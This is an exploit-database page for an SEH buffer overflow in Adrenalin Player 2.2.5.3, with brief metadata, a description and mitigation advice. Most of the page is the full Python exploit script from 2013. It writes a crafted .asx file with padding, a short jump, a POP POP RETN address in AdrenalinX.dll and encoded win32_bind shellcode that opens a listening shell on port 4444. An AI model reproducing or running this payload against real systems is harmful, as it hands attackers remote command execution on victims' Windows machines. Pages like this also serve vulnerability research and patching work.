header-logo
Suggest Exploit
vendor:
Adrenalin Player
by:
onying
N/A
CVSS
HIGH
SEH Buffer Overflow
119
CWE
Product Name: Adrenalin Player
Affected Version From: 2.2.5.3
Affected Version To: 2.2.5.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2013

Adrenalin Player (.asx) – SEH Buffer Overflow

The exploit takes advantage of a buffer overflow vulnerability in Adrenalin Player. By sending a specially crafted .asx file, an attacker can overwrite the Structured Exception Handler (SEH) and gain control of the program execution flow. This exploit has been tested on Adrenalin Player version 2.2.5.3 running on Windows XP SP3.

Mitigation:

Update to the latest version of Adrenalin Player. Avoid opening .asx files from untrusted sources.
Source

Exploit-DB raw data:

# ======================================================================================#
# !/usr/bin/python									#
# Title:                Adrenalin Player (.asx) - SEH Buffer Overflow 			#
# software: 		Adrenalin Player						#
# version : 		2.2.5.3								#
# Platform:             Windows XP sp3							#
# Date:                 June 18th, 2013							#
# Author:               onying (@onyiing)						#
# Blog :		http://itsecuritynewbie.blogspot.com/ 				#
# Thanks to:            Information Security Shinobi Camp | http://www.is2c-dojo.com 	#
# ======================================================================================#
header="<asx version = 3.0 > "
junk= "\x90" * 2079
junk+="\xeb\x06\x90\x90" #jmp short
junk+="\x13\xf3\x16\x10" #POP POP RETN AdrenalinX.dll
junk+="\x90" * 16 # NOP padding before shellcode

#win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk+=("\xbb\x25\xaa\xd2\xa3\x2b\xc9\xda\xd6\xd9\x74\x24\xf4\x5e\xb1\x51"
"\x31\x5e\x10\x83\xee\xfc\x03\x7b\xa6\x30\x56\x7f\xdc\x5f\xd4\x97"
"\xd8\x5f\x18\x98\x7b\x2b\x8b\x42\x58\xa0\x11\xb6\x2b\xca\x9c\xbe"
"\x2a\xdc\x14\x71\x35\xa9\x74\xad\x44\x46\xc3\x26\x72\x13\xd5\xd6"
"\x4a\xe3\x4f\x8a\x29\x23\x1b\xd5\xf0\x6e\xe9\xd8\x30\x85\x06\xe1"
"\xe0\x7e\xcf\x60\xec\xf4\x50\xae\xef\xe1\x09\x25\xe3\xbe\x5e\x66"
"\xe0\x41\x8a\x9b\x34\xc9\xc5\xf7\x60\xd1\xb4\xc4\x58\x32\x52\x41"
"\xd9\xf4\x10\x15\xd2\x7f\x56\x89\x47\xf4\xd7\xb9\xc9\x63\x56\xf7"
"\xfb\x9f\x36\xf8\xd2\x06\xe4\x60\xb3\xf5\x38\x04\x34\x89\x0e\x8b"
"\xee\x92\xbf\x5b\xc4\x80\xbc\xa0\x8a\xa5\xeb\x89\xa3\xbf\x72\xb4"
"\x59\x37\x79\xe3\xcb\x4a\x82\xdb\x64\x92\x75\x2e\xd9\x73\x79\x06"
"\x71\x2f\xd6\xf5\x25\x8c\x8b\xba\x9a\xed\xfc\x5a\x75\x03\xa1\xc4"
"\xd6\xaa\xb8\x9d\xb1\x08\x20\xed\x86\x06\xaa\xdb\x63\xb9\x05\xb6"
"\x8c\x69\xcd\x9c\xde\xa4\xe7\x8b\xdf\x6f\xa4\x66\xdf\x40\x23\x6d"
"\x56\xe7\xfd\x3a\x96\x31\xad\x90\x3c\xeb\xb1\xc8\x2e\x7b\xa9\x91"
"\x96\x05\x62\x9e\xc1\xa3\x73\xb0\x88\x21\xe8\x56\x3d\xd5\x9d\x1f"
"\x58\x73\x0e\x46\x8a\x48\x27\x9f\xa6\x14\xb1\xbd\x06\x55\x32\xeb"
"\x97\x17\x98\x15\x25\xb4\x71\x64\xd0\xfc\xde\xdd\x8e\x95\x52\xdf"
"\x62\x73\x6c\x6a\xc1\x83\x44\xcf\x9e\x29\x38\xbe\x71\xa4\xbb\x11"
"\x23\x6d\xed\x6e\x13\xe5\xa0\x49\x91\x38\xe9\x96\x4c\xae\xf1\x97"
"\x46\xd0\xde\xec\xfe\xd2\x5c\x36\x64\xd4\xb5\xe4\x9a\xfa\x52\x76"
"\xbd\x19\xd1\xd5\xc2\x08\xe9\x09")
junk+= "\x90" * (3000-len(junk))
footer="</asx>"
file = open("adrenalin.asx","w")
file.write(header+junk+footer)
file.close()

Navigation

Suggest Exploit

Services By CQR